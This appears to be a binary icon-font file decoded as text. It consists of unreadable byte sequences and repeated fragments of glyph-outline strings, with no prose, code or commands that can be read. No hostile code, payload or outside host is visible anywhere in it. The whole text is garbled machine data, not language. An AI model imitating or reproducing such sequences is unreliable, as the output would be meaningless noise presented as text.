	�U<V�U '�8�
N��6R#Y��mA�

	
	



!
2��2����@U#5#4.#"67>73!2>54.'535".54>32#zw#
	&"			*
)(	')x'���
		
		l,
	
!


#):'��V':)*,�+ 

		

����FRg|��k21!#+".54>;7>3332>54.'52>5##".532#".54>32>54.#"3'2>54.#"3#2>54.#"332>5<13032>5<13032>=4.#0*1/."1#0"'."1#0">573332>=332>=3'332>573032>5<13032>5<1331j 2"��G
��i
 		
}?****��

		�


		�




Y	]H
)%$)
%�!/��]j	
�*<'�
	�'=*+44+**  **



�	


	




��6<1A	d44eb�yyyy�bbUi[4;..;4[iU_�����+9Fh�����*32>7.#%!!!!!!#'3#3#33#7#'#73733#73#3#33#'6&4&1##726:3207#".'>32.#"32>47'#'3#73#3#33#'1#'33'3".'>32.#"32>7#7#7'373�
����IJJ����BB&$"*z^C?("$(g


l	
	


*ZD@("$(o+(I
	
		g$ �(uI������HI� %V22V�22�� %/5�

6:



:� %RR�NN�
		532S<<R��>�:Uw�������	0%4.#!"13!2>51'!!4>76"&/&>'65'>/."?#0*1".=4>30:121#26=+26=7#".54>32#0*1".=4>30:121#26=+26=7#".54>32#0*1".=4>30:121#26=+26=7#".54>32>�?
�
T�D�o .on-�� -
on
-�&!%+& 



d%!&,& d%!&+&



�

�@
��Gi�8
��
9����8
��
9��gkk�



��



��

�kk�



��



��

�kk�



��



��

[����i~����<o����."#;6&>7>7>32+;37&>323'>323>'6.#2#".7&>3&>7>32#*1".'#".7&>;2#32+".7&>3>762#0"&"5.674>#*&0#.'.5#*.5.'.74>74>3>7630"1".'2"2"3.'.47.'.467>2"*#".5#".'7&6&4'4>727.'.>7>0"1".'&4.'4>76#2"2"3".'#".7'>32732>7.+'32+(@yaEN


)3:X&� 6%<f�M��



-		N//		//m
	
	}	
	^		

	
	8		)	
**�,Kb6&%�		J3&tBALU.N�g;��				��5
	*��
�		
_	
	�
		
_

j..G"
"))�����	u������2G\q��#'0&467!'#".54>32'5<6454.#*5""1532>5<''02857532>54.'7#".54>32#".54>32'4>32#".5#".54>32#".54>32#".54>32#".54>323#".54>325#".54>327#".54>327#".54>327#".54>32#".54>327#".54>32���2�""""Rg"�	
��		
�$X
$ '$^����""""�ti�"t���el�
	
	�R'&$!(�����	322>#>722>#>322:#2">3&>72">34>32":37>7.#"3".#"".5".'3#.7".'3#".'".'*3".'2.'##.'2.'##".'2.'*#3">7#XY


	


	
>Z=Uh57eW9Z; �	
		



7�}UX}�6G�		|}]:SY 
#,*		|}]:SY 
#,*DKL!*YI.CQCCPC-GY,&RK?( (?M%.n^@ (?M%.n^@`�o<<o�`����)>{����2>54.#"3%2>54.#"3"32>54.##5.535.'.54>753#4.#'.54>7533'33'.+"37%23##".5<5##".5<55!<1.?>;�

E��&C22C&&C33C&,/
,
.
,
	-_#�$$D,!| +D$�-\

	

	
�Q����



�G2C'&C22C&'C2��
7
4	�+g/3����

��l�X��	

	
izllzi
	

	Ee|?Y+K8 ���YX���>2:32>#7>'7"2&2#6.'.'.#"*#.'.&'>7.3'#*.'.'#.'>7332>'6.'>32#".7'#".7'332>'73�	
�		
	"!##(39"B:)	%"=
�		2-2; 95+�5@F&@tT2&=R,.
!#!			4

H
�
4
1(��),1UsA5dQ9
1DD��##



l�&;Pe���5354>323##".54>32#4.#"32>5%#".54>32#4.#"32>5+4.#"!4.#"#".54>3!2'3'#5##33535#		�F""""1
	

	
�"##"1
	

	
�E!,-!��!-,!9
�J��E��iiiiii�
		
�""##				""##	

	


 }
-!!--!!-
�
	�����iihiih����3Mb���76.'.''>7>7.'7>7>'&>54.'.'&>7>./?7.'.47>?'76?>&'4>7'.56$5>45.'%-777&&57'%.54>77&%>54.'�

"%

"%			
	�%"

!!!!�.�.m
V"B
[
B"V
m&



��
%W
[!���mLg{

d
�tw�
		

_((%)&'�
		

 !

!!

H

	

%('4" 

 "���

�
I
:B8*

	
,6D8	G
	�  �
L		�lk
wvxwnq	

	

 	


����=]j�#".54>32%#".54>;232#54.+"#!".54>;232'5##33535#2!#+".54>;7>37� *+  +* �� ����������@@@@AA<+ �xI
��k
 !�u*  **  *��=����@@A@@A�+�Tcm	


�����P�����54>32#5<>?>323<>5>?>54.'!54.#"35<./.#"#<.5./.54>72>54.#"3#".54>32#2>54.#"3*#0."1'.1#0'.1#0>?3332>=332>=3'332>74>4373032>5<13032>5<130281232>5<13032>5<13032>5<54.#�
	

���i"j
��

���i"j
�		

�			

	�-	#
q
X
$#2-,2"!	
	
!

�����

!N�pt
����

!N�pt
�					

	�z		<<		{x����wwh�o		@G88G@		o�hxCI=#&&#AI<��KQ���!!5%#54.+".'.67.'.54>3"72;23#54.+".'.>7>54.#52323#5;#5U���.
{#3"#


{- G.%7#I
*";+"-G1u..H--��>

		
2'- 
	
		
)>T7,		&.(7 "8H$T��������cx��'.54>754.'&0457>=>577>5>=40405%>54.&4&4&'.'001>?>577>523>'7' 

l�								�H
�F

8d^

		
^d8

��88`�'
)������



p��r�



����
��
	�����		��		y�	��)���0?#"&5".5462354623546235462%"&5#462�
"'! !
 !'"83=2t��#
-


��	


��	


��	


���Q----7����Nr�����"Bb�����?_#5>54.#"13>;#"33!334.#%#".'.74>7>7#.74>32#.454>7>"#".'".54>32#5".54>32#6.'.5&>3&'&>2".'&4>7>""#1'".'&4>7>76*9*.#.67>#12>7>.'.3172>74.#";1':67>&'.31'2>7>.'.2312>7>746.'.31'12>54.#"3172>7>4&5.'.:317:>7>&'.31�s5H(">3#)~5X?!�-�/�9S5�	C1	'				_/
|

/;			�				5	�			6		ч"',(H5'3g$<M(������IB6"�	�		S�>e@heK��	
Ae=Keh	M	M	��		OP	>		�OP>	����-D���>7>75&>54.&''.'7'&"&5'.'.'.'.'&7>5<5742>?476..54>67'�6</(*52	�+

	




z))*G9#�#9G*�I
		
3	

	6 "


n



%���4;-&(1.@U�����	����/"("	
���}Kn{0�
			k�������)>SXm����c"32>54.#".54>32#:3<5*#7"32>54.#53#".54>32#7".54>32#7".54>32#".54>32#7".54>32#54.#"374./.#"#4&4&'./.54>7!54>32#5<>?>323<>5>?>54.'CvW33WvCBvX22XvB=jP..Pj=<kO//Ok<��5\E((E\55\E((E\5�jjm@		%				\��

���	j"l	
	�	��	j#l�3WvBCvW33WvCBvW3��.Ok=<kO..Ok<=kO.:�(E\54]E((E]45\E(�kk�				u���				�

��		��
�
"P�	r
v
�		��
�
"P�	r
v
����
 +6ALPTXc�6.'>.'4>74>754>76.'56.'!%3'-'0704.'#".'.1.54>32>320#".'{"
(
"	'"	'"	'"
("
(L�[������|
���0*21v	

	('
	
-*,#_,% -*$
�*-"y*-"�*-"�*,#y*-#��m��0����1��(.$"*&�]


((


���U�2FZ#".54>32#5.?>;2/#?>&'".1!/.670>1�&43''34&��s*�

�

�(v��qSU)�
	#��pRT)�
	$,4&&43''3�Jls(�
	�'vm8pSU)�$pSU)�$���~�����;2354.+".'.467>4&'.#".'.54>735;2354.+>54.'5#"3#5;#5"32>54.#'35#>32!4>7#!#".5

Q		Q	
0$ /%!�0��h��OO��hh��OO��h�
~)���5:= Q�j>��
�X�59= P�j=�
		))





$


$77/%
$&	!	�[[[[O��hh��OO��hh��O�	 =:5ZH
>j�Q =95�Z�
=j�P]����.CHMRWaQ"1;;3533>54.#".54>32#3#553#53#53#53#5#54>7>7302627>4'1.'>58401<.5>7>4&'.".'4>7>4&'.".54.#"#*.'81.'.".'&""#8+"2306261>;2>72232>7&"&"#"30:61>3:322326265>4&'1.584184014>738201812."#"27>32"001#54.'.'#".'#".54>7>3:3>32>32>2632'@xbDO	3(6;�Y^!5&;g�N��		OYYYYYYYYZY�
	%	
	



	


		
!				
			#	


$	
 


	
�,Kb5'%�i6)t44ABLT-N�f;�6				��00E00�11E11%0

!m
	



	








	

	



mh$	
	

���Bm��!!5%4>32#".5'#3.54>;7#"3!2>54.#2>54.#"3>32#".'#3"73>32#".'#32>54.##0*&1.".'4>7>2
���a��L�rt�
	�@pS11Sp@*MC8�
"%+L9!!9L+
�5>F%O�wX;_?LZ0F{\66\{F,RH=�Yq�Ic��JJ��cl--,011~<<~O�	

		
�U1Sq?@pT0'6!
!9L,+L9!, 1VxG	(A/5\|FF{\5(7"?jL*K��cb��Kl�k)6CP]jw�����B�2#".54>32#".54>3>7.767.767.76.'%>&'>4'>'>5''".54>32#327>/.1#02>?33'%2>5*#33032>5<54.#*###".54>75".5*#"32>5<13351%##".5##".5##".=4>;2#".=�				e�z	
2CN
I	
	TI	7				9*	+j+	)7�7�I		
		
		��	

	
�
?				,�

S	
F
	 		
(:|
�\�	��	���

+60092	<<	29006+�����		Z��		.�������_�2>54.#"3*#54>'.#.5<15.'0>&'#";2+";2+".54>;2>54.+".54>;2>54.+".54>;28132>4150"&>7>75*#"32>5<13!3032>5<54.#�2&&22&&2�	 +3 

		
$#	�



��



���	

	��		$
		 
0)%B3

	2v2

	0@$�%22%%22%*�BE5
�		
	

	


	



	
�
5EB �/@%��z


{�m�0�m�{


z��%@/	����4KU���.�#5!#4>312!54>322#".54>3+".54>;2%2!5!%4.#"#".54.#"32>54>323'30>54.1#01380103>5!!4>;2#'4.#"0.14.#"0.14."#0*#.14.#"0.14.#"0.14."+51#".=:31232>50>7132>50>7130:31232>50>7132>50>71;#�Z��[		
*		��

E	
b

b
		���	



	

r"X#�x�� 

�

	
�


"

8��=

���

�
�		
		
��� <		




��`

		!!��fR



�1
"#//

"#//��

6	#*

	#*


6

����5Uly�����4>32#".5%2!5!2>54.+";34.#"!4.#1"35!2.#"'>33535#5##3#".54>32"3733'33'.+".54>32#152>54.#"315""&'.4'54>32176211��	����		a		aY
	��		Y��	"

#
J







}77((�()67|�j3''34&&4''''6F�

*���				���		�2

�Εa

C	@
C_







R������)&44&&44&#''''XS@!����)_d#".54>32"32>54.#4>3230<54>7>.'.30<55#3�L��ed��LL��de��L�N�g;;g�NN�f;;f�Nc$'p!'	%!$LB2
&$l�pp�e��MM��ed��LL��dy;g�NN�f;;f�NN�g;��(	*& o%# BA< 6M5	
�Jrr����)>Sh}����'<Qf{�����>4'.67764.'.>77>.'.>764.'.>77>.'.>7>&'."267.'&4>7>.'.>7>*#"32>'6&6&;37333232>7&6&6'6.#.'&4>7>.'.>7>'"&'.>7>27"'.67>7"32>7.#>&'.47.47>&'&'.47>7&'.67>''.45>'.74>''.5>32>?64.'&'.'&37#
!&,
(*�		�
	D		�		�			>
	�		-P[O6'

	&(&		%4�		D	
�					�))''5				E	
&
	�		
��

S	
	
12

)"?�4$�	 '+		 '+	w	u		'	M	yJ	N	+&3fra
	

	blV����Vlb	

	
arf3&2	'		�H	Z(''(%[	4<	 		X		�		�	�	
	�\
	�
��2�A
b��{�R���������2#".54>3232>=4>54.#"#".54>32#".'.'.#"#".54>3'77'77'77'77'77'7'77'7
CuV3
&-;!!;-


"3=3(F]5 91+


5YxC	/UA&
		
%*'"

	

#<Q.�{vu;vu=vvGvvBvuCvuK/0>/0�4XvC-((006"G!8*+:!

 O;XQW;5]F(%CuX2b"<Q0	

	
	
.Q=$�vu;vv>vuEvu>vvIvv0/?00����!!!!!!]GG������G+GGG����/����/D_t���.�7".54>32#<54>3:32!%2>54.#"3<54.#*#"!%".54>32#7>130!5'!!!2>54.#"30.1.1#0010:32>?13:232>?3302623>/5313:61>45%".54>32#02>7>45#21;2>7>7354.#"1#".54>750".'.5#"#'."�



�
		 ��/





�
		 �&

�444����x��D�
		

		
t		V		0000�	F��
[	
	�
	7Sup�



�#)&		&)#�





�#)&		&)#�



�

�ǜ��3���


		

�$$]j����j]



b:
�� 	CD
Rup`����"'BOUbw������
%7'7'77775'75'7%.54>7>'7.6775>?&4'.54>77>54.&54&'&4>7>7>7>&'.54.54>5>54.'54.'.'.'.5���LL*DB!"AB)ILCLL�LL�LL�LL��d�

;G;�

�,o�'��~���)l    F!!!!;

	

 2 

	


	


	

 

	

1

	

 3��\<93dgib07=E_aa_���)��'X��3:��0�2��.
	

!
2
!;" 

 "G!

!<!2!
����)>!s��K2>54.#"3!".54>32##".54>32*#0.1'.1#0'.1#0>?3332>=332>=33332>72>4?3032>5<13032>5<1382132>5<13032>5<13032>5<54.#.'.'.'"&*#*"#2>3232>75#".''23>75>72:3:6355.#"4.#.'#".'32>72:3:63500>7532>74.#.'5.'0015"&*#*#".'4060=.'.#">31*		��				e

"
,�n,	+?8



6>+*				)
				v*+-.+*)))))(	.01
		
*))	
10-�?()*



10-�46910-468

H								�



:�KK�	����

��

������
		
QXGGXQ
		
����T[K		,0%%0,		Q\J!
�� #.

Uy��" C# "�uU	' 

Su��vU	'"�����!!!!!!������6e5y7�����7	����E������.%."'7>4&'."'7>4&'."'7>4&'."<54.1!717>4&'"1;7>27>2!>54.#".54>32#2#".54>3".54>32#.5>3#7".54>32#".54>32#7#532>54.+532#�

��

��
��

�
	I��>t_BM
.!� 4$:c�L���(






'*((���
��
��
�
dxb�

,H_4%$�.!e7?JR+L�c:�B		_uP


p



:l!!'(���y�P232>7>.7>'.'&#".32>&'.47>3*#%" %@?C((C?@% "%$	*�%3
)VG-)E\32L=1*RV]5, 

 ,5]VR*1=L23\E)-GV)
3%���#9H*#1!3!2>=:32>54.#*#5:32##!".=!'��%k%%A11A%((�%��%���%%.@%%?.���&'�$$���l�$'!54>10!''#54>10zww�#�NR



�6����u���(

(�Au~B"		"B
����?T}!!'.3:32>'2&6&7.#3'7>32#".''!3.4'>;7#"!>'6.#9��e:I:
���	W��p
�FsU..VrF@h����
�{}�	+ 5AA�*3.

���m��G

29.pNm�JJ�mNc9



U.z		
!	

����+8OT'.54>7>67.'''5'57577''.#'7%%5�$01##10$�576I"''"H5987#)"")#�"0y0"0oK&5"�"6'Mp0���$w1""1/%%/B	�

�	d#!("$*������)#%'���_]g����*S32>7'#".'.7&>7'!'3'#'27>'.#!7'%:*!47<7aQ8
6	0AR+0/)!1w8�����	"	1J�h!:FP*;83"#?W5
,H3
*.1#B900��^6�!	!�G��(3���������7".1!01#./&&'81'.*"#"32>7>200*#%35#7#33535#5#".54>10#/>7>.'.'"#'.7>7>/.7>01U�����
	b!%!


	Jdf�}}/////+$*$#+#+�

�	�
H��aw
v
��AB

		


 :  �....�"*ZS;;SZ*"V

	
�	




�
	
s����#3!3#!B�����}��C�x� ����o�Q��2>54.#"32#".5<1#!#0#".5<54>3:3.454>7>54.#"32>5<&4'.'32>7>54.'.#"3&&33&&3�%B1	
	4��3	

	4D%fug�




[



	

�&33&&33&*1A%��|

		
}�o�(�o�}
		

|��%A1�	
	


	
	

	
	


	
	���=Wv�%"./7>32#172>7>54.'.#"3%.'>7.'.54>7>772>54.#"3�J�~m))m~�JJ�l))l�J


(6�HR[1/"	1\SI��	

1^UJKU_25







�$Eb>		>cD$$Dc>	?bE$~


6(�)E6&
,6@"/+'


&6F)�

'+/.+'

&6F**G6&
�







���-Vv�!"3!2>54.#2#".54>3.'#!#'.7>130%"#33535#5>54.#".54>32#z�1$$1�1$$1��$$##	
K%x�Ax%K
	
N)'�')M
	��, %$$$%%%!,�$1�1$$1�1$m$$$$�w�]���	
	(++(��	
	� ,( !%$$%! (, �

����7Pe����*@"32>'6.#*'2&4&3'64>30726%!"3!2>76.#2#".7&>37>;2#"./.67>>5246&5".'7'3#6?>#".'.65'77&>32#".7#".'7&>;23#".'7&>32/.74>'+737&>;2�54(b�2"$0�/%#1��	�&�
&j

>
ca<	gE�13N��'%%'��
1
�f
	

�	
�
�
�6	1
/



F?1�$0�0$$0�0$���rr
	I	.EE.	I	
*#86&&'&��	�		wx6		�		��	
					�	xw		�	
����8Qjx����0"$""3!2>54.#".7>7"37+0*153209+0*1532097'5>4&'7>&'7'>&'7'1'>4&'71'>4&'7����*)(

*�554&'33
	
[773








*
�+��()*��N�nh�I�
%#!"��/80��1:0(


"#!
(*(020*
7:8
>A>EHFMPL����iv���.67>&'0.'464614.#"74.0"72>3067>7>&'4.'&>73!!'%7267"&'!"3!2>54.###'./!!�
			M	<			�
:5�['�/��:���:��1$$1�1$$1B'�*�}��				b	;'-			

����E��

�9::9�$0�0%%0�0$�e

q<
t.��
����5Ng������/Hd}����0& ""3!2>54.#+".=4>;22+".=4>;'54>;2+".54>;2+".=7".=4>;2+754>;2+".54>;2+".=7".=4>;2+754>;2+".54>;2+".=7".=4>;2+#0*9".510<13%#4.'."#4>3#0*9".510<14>;2+".=54>;2+".5#!".=4>3!27+".=4>;2����*
((
*D88�888888W8807788W8828888W77y*3+���[r@�
 
	�Dy`�ʪ)2)8888>�0�H88�
*��(

)*�^++m++B++�++@++�++�++@++�++�++@++0�"-,
	..!�0{++��++x**x++		����/Pt�����!"3!2>54.#2#.#"#>3332>73#".5<647.>7'"<637266.'#".54>32!54>3!5#".54>;'.>?'##>7>4'./7#&/.6?>;2.'#53}�
.##-�.##.��
/	
.
Q67

��%+(!HH��Y	��



�O<S<O
c*	�
*c
 ���#.�
.##.�.#v

D

�+*&'(���L	e~



|�

3>2'

'2>3

A

	x	

	x	

A�������10" "1"3!2>54.######5353535353����*))
*����ҍ�����+��)
)*��I����H	�����������!!#32+32#".'0#<1"#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32#!"3!2>54.#2#".54>332!>3#".=3#5##5!7".=31#7!!�z�]TJJH
		&
	HJJTTOO>>&>>OOT�0$$0�0$$0��$$$$q��Q)Nn%n@N\��:��|

0%0�0$$0�0%X%$$%��

""]776
""
pM������-Wg���!"3!2>54.#2#".54>3>;2".'&4>?'5#0>7#'7>782177'#".54>30:3?32+".54>;7'#"!".54>70" "#".1504>3:12>;210#'".54>32#y�1$$1�1$$1�wmd
4s
	j POY1;3�d;	!�<�1|


&/(
"3�



�

t_\r	��

�����۵	I
&





�$1�0%%0�1$��~+'NCQV6A8��	P�[J




	
1







	�		

<	
	�





	����	*8=B[j�3#5!!1'#7'*+#53273##32>54.#73#5;#57!"3!2>54.##!".5!#!".=4>3!2IE��E+4#'N&+2)p
�*�1$$1�1$$1�
��
]��-[[�����55N`f�
E4MZ U

�[[[[�$1�1$$1�1$��		S��zcc
����ez����)>S�".1."03:>732>146<54.'"&"#"0#".5<5>54.+"""#'2>54.#"332>54.#"3!"3!2>54.#610>3210>+#".5<647#".54>7153533##5#'&>?>281#".'".54>32#3".54>32##".5<>7>454.'.5814>36�


	 y9�0$$0�0$$0��



(66(


A4:55:4�

	


	�



��		





G			G,$0�0$$0�0$s

	6))6	��;44;44-*&	
		+��



+		
	&*-
����)>Sl�������"32>54.#"32>54.#"32>54.#7"32>54.#%!"3!2>54.#4>32#".5'7!50:32>54.'''7'7:#"32>7.#'#37*#&6&6':37"32>'6.#".7&>32#2		4ms
		
�0$$0�0$$0��1C&&B22B&&C1*���@.9)H6
"[0�8
W1 !%��
		
%=;
		=#<..<#!>,,>!5&&53((3		�k�$0�0$$0�0$��&C11C&&C11C&��ii��K5H)0+$�./v	&!%�2;D$72-Kh-<<0





�-=""=--=""=-��(44''44(����-��!"3!2>54.#>'.7'".#0.'.'4.1.'0.'.''.77#".5<>70>7>3;2>54.'7321'+7v�0$$0�1$$1�O
	
	C	!J		
g	
Z:	

T�
�	

+
	
	"!�	�$0�1$$1�0$�	
	
���x�	

	3@: ��
p

!+(
	%		r
{{

:����#8Rq��.'>7>7.'.'>67>7.'>7>7.'.'%%>76../7>6V	


",








�&
'MD=<CM'��
(OE>?FO)
9�1#%/�/%#1"![gv=?tiY##Yit?=vg[!	


	+#


^




�#.4'#!
	

.8#!:, �'""
		.9$";, 
%%�%/�/%#1�1#�4Q99Q43R88R3���C@Uj�!"3!2>54.#!5#".=#".5<64?0>7>32.'0"&"#'#'5'.'7'.#0&"0#'#"'"170:137>77'>7<0457702233'017:337>77'>70464175'4.'7'.'*&#'#7>77'>74646575'4.'7'".54>32#2#".54>3'".54>32#"32>54.#|�0%%0�0%%0���0+!(?
6O`4?nS/+%-& &-%'


& .- ��		
						��

		�%0�0%%0�0%�t��] ,T	�
*O<$0Ro?$D=5�/- %$'/

* %,'s				�		�				*	
		
	���� ,C\�����32>54.+"3!!5!5!%##33535#32>54.+"3!"3!2>54.##".=4>;232#54.+"!".=4>;2321#!!!!5!5!�XX��8���233233GXX�0$$0�0$$0�o��nT��o����e��8��:z������33223\$0�0$$0�0$���0���
��L��wQ�����	����-:k�!"3!2>'.#2#".'>373733##7#"./!'#".7&>?>;2#767'.>''w�/%#1�1#%/��''%%�LSTSUVU�]��]
���
�F
!(
{x *���$0�0$$0�0$�&&&&"UTTUTT��]]
	��	
}	*,	((	,*	}55����-2v��!"3!2>7.#2#".'>33#'#7#!7##0*&1.?373!'.657!7>;7'&>7633%&>32#".73>32#".'q�/%#1�1%'/��"
$!!���6n�<�1�v0!'	#Q#(��)�<"
		%[�<�F
		
n				�$1�1$%0�0$�""""�ᰰ������
uuui
&
l�
	
��y�1�















����7LQ�#".=##".=#35#%!"3!2>54.#35#'3#35#53#3!'7!50:32>54.'''7'7:1l	
3

1�0�1$$1�1$$1�KD3DJ�����7/9*I7 
"]0�:Y0# % ��

��

���$0�0$$0�0$��0====��Sk l��L 6J*1,%�//~&!'�3=E$93-L����-Vk��!"3!2>54.#2#".54>3.'#!#'.7>130%"32>54.#&'.'.1.'.>7>1>7'./.>7>01037&'.47>2y�1$$1�1$$1��$$$$
J%x�Bx%K


M)'�((M
	��5''54((4?
	
	




	
	�$1�1$$1�1$l$##$�z�_���	

(**(��

	�(45''54(�

	)"	
	@	

		����7o���.#"32>7>'4.'>54.#"32>5<&5.'.54>7!"3!2>54.#2#".54>3#".5<1#!#0#".5<54>3:32t	
		�	
	��0$$0�0$$0��))))&


)��)



)7S^S4(





(






�$0�0$$0�0$V))))�



epZ��}Zpe




dwi4''4iwd
����-Sz��!"3!2>76.#2#".7&>3>;2"76"./!!##&'.47''7''777>;".7&>32###33737#w�1#%/�/%#1��  ""aJ!)+	_u	1i��ׄn	�3

�6u\##!!�7/-5-/�%0�1$$1�0%�!!!!�&�! 	%%��|�
0
	��#!!!!�.7..7�������&>7'/7'6.''5"'.54>275.54>75'.54>75.54>75'.54>756'7'6&7>54.''/./%%�
:5�['�yyu
>
	uyy����dd>dd����0$$0�0%%0C
(�+�~�y
���F�)'%!NL
')')')'l#1�1$&/�/%�d	r;	
s.������&@MVo�.+32>7>54.'&>73!!'%+#532#53#3#373##5#5%!"3!2>54.###'./!!\++a5�['��	/.`
ު�vll|�B/D�1$$1�1$$1B
*�*�}��B��@+2��E�Q�
	
a�(/'9)�(��(�$0�0%%0�0$�e

s>t/������
4����&>77%%'5'5<5<1''577'4.14.4=4.'.''57221'&"&"'6>7>54.'%%>54.'./�"5�^$..��+*-*+D((C�3-.k
	?32�0$$0�0$$0B*�*��w
?^��Dc�����������X�		�;	%0�0%#2�2#�i

q>t-������ajsv��&>7'%7>7>7.'.'>7>6'.'.'/'?'?7'%%>'.'./�
4�Z&�b
	-
		
	
.	
*R0O6N2%�D0Dy8f�0%#2�2#%0C
+�
)�|�y
?,1��F�		
						
4-/���)'��bY%/�/&$1�1#�fr?u0������-<��!"3!2>54.###'./!!'&>73!!'%32>7>73#".'.54>7>32#.'.#"#5#53#y�1$$1�1$$1B*�*�}ϭ
5�['��		

.
	

/			/C�C�$0�0%%0�0$�e

s>
t/��Z@+2��E�



	


	
5�((�
����)0" "1"3!2>54.####3353����)()

)��������+��))*����|������1r#".54>32%0" "1"3!2>54.#'5#+".54>75.7>7.54>323357�

����*()*�e
"!	�	"#
#!

	e�1

�+��)
)*��%#"1!�

�!1"
	



%$�����-9Ncx=�!"3!2>54.#2#".54>3#".53%2#".54>3'2#".54>76.54>"&"./''.=.='7''".4?>727>2543666'.5<54.5<''.='./4.5<''.5<55'.54>77>7>54.'5>56y�1$$1�0$$0�!!!!3



d���

�Z 
!
:	
K		
	

q��
9

�zU				(�$0�0%%0�0$��""""�#))#��


						�N�bb``�PR
))
R
5(/,�	METJ+.&$0)HVCN��
U
	�

!2�
	


�1!'������!3?KWd������1>54.#*#353:3'4."''#5:632#35#535#35#%35#535#35#735#535#35#/#357335#3#".454>327.#"32>=#357#'#35135##'#!"3!2>54.#!!!!!!'2>7'#".54>327.#"3�

	

� 56!�Y 56!� 56!S�
	"B�$!��-##.�-$$-����
�	

	�	m+'-
!mmm3)mG**GmB	



		
+*C11D)DDm@@�#.�
.##-�.#����

���N




����Sh���)D_%!!2#".54>34>30:121#0*#"&=0*1"&=*1".='2#".54>34>30:121#0*#"&=0*1"&=*1".='2#".54>34>30:121#0*#"&=0*1"&=*1".=0" "1"3!2>54.#'46276"&/&>%7>2/"&57.7!".514>3!21#Rt��-				7



;				7



;				7



���)
())��&'
]
]	��]

]
&&

���
z

ar��A		H[wwww[H		H[wwww[H		H[wwww[T+��)

(*�/��/ooon
/��/�0x��
����#Vz����6Xo��
1H%>4'.'.3:63'813:>3>&'4.'.""':12>76.'.'".'&2232>7>.''>32>54.#"3:772>54.#"32232>7>7>&'.#";2>54.#>4'.'.3:634&4&'4.#32>5154.+";2>5!"3!2>54.##54.#"#54.#"#5#".'32>54.+5>7>&'.#".5<64?0>7>32'#32+32>54.#82012>54.'.#3"32>=4.#�%(	


	
�	


		
		
�		�$$� \%%�0$$0�0$$0��G/) 	>
6N_3?mR/+�
		
  �		�inc				C	|		�		S�$0�0$$0�0$�y�\(:	�	+M<$0Qn>$D<4�	

 !��

		%%
����-BWl�������)>S��!"3!2>76.#2#".7&>3'2#".4'64>3#".4'64>32'2#".'>32#".7&>3'2#".'>32#".7&>3'2#".'>3".7&>32##".7&>32'64>301".4'".'>32##".'>32'&>32#".7>32#".'".'1'75"2"2##".7"6&6#1>7#70242#7>?>232##'2&>73}�+!)�*!,�Q




	?cu
			�
N	
�i�
�� +�+  +�+ ��3C!��:(N�`PK��		�W{N
	������)Ef��3#77#33737#7!"3!2>'.#/.5>"7/.7&>7>7/>7>.'6&4&5".7&>#0##"."/*&'81'.*#"32>7>00*#".1!01df%'%%'/�/%#1�1$&/��	_

^

O
�		�
:
zx
y$
 ""7����	
	
O



		

<QQ�#{%%%%$0�0$$0�0$�U	

		
	k		
		

t
	

��"HC//CH"^56
	
		




�			�����#!"3!2>76.#2.':3323>7">7332>7">733:3#23>52>7#32>52>7#3#3#*#.#4.#"2.#4.#"2.#4.1*#.3.#"".3.#"".3.+'.7&>323">32z�1#%/�/%#1��@Zh'	

	

		5)g_?B
			





A+C)AJ(
'L?-B.�$1�1$$1�1$��,RsF/EQ"9./EQ"8/FsR,Z!

B=+E[\
!

B=+E[\
.8< A5!1;22;2"6A872		���<HTm����%.'5234.'5#.5#35>54.''.54>75!"3!2>54.#2#".54>32#".54>3>;2#'##7##7".54>32###".5<5##".5<5!5!<1".?>;235	#"


	$"

5#	
^�."".�.##.�
		

		
�;





}a"5�5"g4''44''4vG


			��r		v

�	#�(

	
	+
	
"P%".�."".�."�





	



	�|ffff|��'45''54'@��		
R_T

T_R
		5P`1D";+�
��D����2K��'.=>557>=4.'&7>54.'>7>666244"&"&5.'<54>7.'.&'5./754>7227>37>7z


��0$$0�0$$0�-)
	�


	
!.692,�$)./)#(	�
	0$A2'D\4M

		

�77�#1�1#%/�/%�)
	8�z%�'	*	.@Q*5ZF&	����)5N`u���"32>'6.#%"32>7.###33737#!"3!2>76.#3'>323#7".7&>32#".'>32#7#.#"#6.#"#".'&>3!2#3'�		�M				�UVTSTVv�1#%/�/%#1��	r�

�

�6#%�%#-		
U=


��9

		
	


	TUUUU�$1�1$$1�1$��
		
�
L$$$$
L	�e
g��	
���-����;P!"3!2>54.#2#".54>37>;2.'.>?'##>7>4'./7#&/.67<.'>7>7'.'.'>7.'.7'3202017'37'37'3732+".54>;7'#"!".54>70" "#".4154>3!2>;210#'".54>32#��1$$1�1$$1���%	
�	&X
	E4I5E	X0	
	

�		�

	

cS=W�



�

u_]r��
����	S	I	
%

�$1�1$$1�1$���j
		
j	
:
	.6,#





#,6.	
:
	Z 
	

G

G
  
 ��ZY__
_^	WV






	�		=	
	�

���-Vv��!"3!2>54.#2#".54>3%#".=4>;232#54.+"".=4>;232#!#+".54>;7>372!##33535#z�0%%0�0%%0�""""��p��o+o����
9
�{U�"���433433�$1�1$$1�1$��""""Z��
0�����:V	�"��}33443����Gs0" "1"3!2>54.#".'.54>732>7#%/!'5.5&>76*&'3!7����*)(
)�M40,
#3 *	$(+'F9)	.2EU/m
���)	��~1E�*��))*�j
,14$E=2))29+($->&.L6c�	�/T
�,����-BW���!"3!2>54.#2#".54>3'2#".54>3#2#".54>3#54./.=4>3234&4&5./.54>32<1#0#".5<1##".'4&</###".=##".=#7#"'.?>1307>130021:32#".5<1#0#".5<1#0#".5<5.'81"./#0#".5#5<>?>323<674>?>54.'54>32y�1$$1�1$$1�				�
		


�
		


n��	
	SR	�Y
'##'

E

X

i���	RS	
	�$0�1$$1�0$��				�	

		

		

		

	�,>

	��		�
	

	[
X	�	@37,,73XcR]]�ssss�^`//_	.:3/95	^RdW\�	

>	�	X
[	

	
�		�����!&s��0" "1"3!2>54.#!5!7#535#54.+".'.47.'.54>3"72;2'#".'.467>54.#5232#54.##53���*
())o�n�7###
_


'

_#
]8 -!#7&#*�##�+��)
)*�#jjjj|0

	
'$


	 0�#+

+7@@*"��jj����1F���0" "1"3!2>54.#2#".54>32#".54>3#".=###".5##".515##".=4040=4>;200#3./###".=##".=##'.?42<1>;2����*))*�




		
�I


		
�									�
	\++e
+MH



HM*
6	�	6�*��((*u

		



		

�a		���		��		ɰ		�
		
����
S�������"�	
�
		�
	
����M\0& ""3!2>54.##"&5".=462354623546235462.5#462����*
((
*�e

				
	
	
	�+&/&�
*��(

)*��		�a�
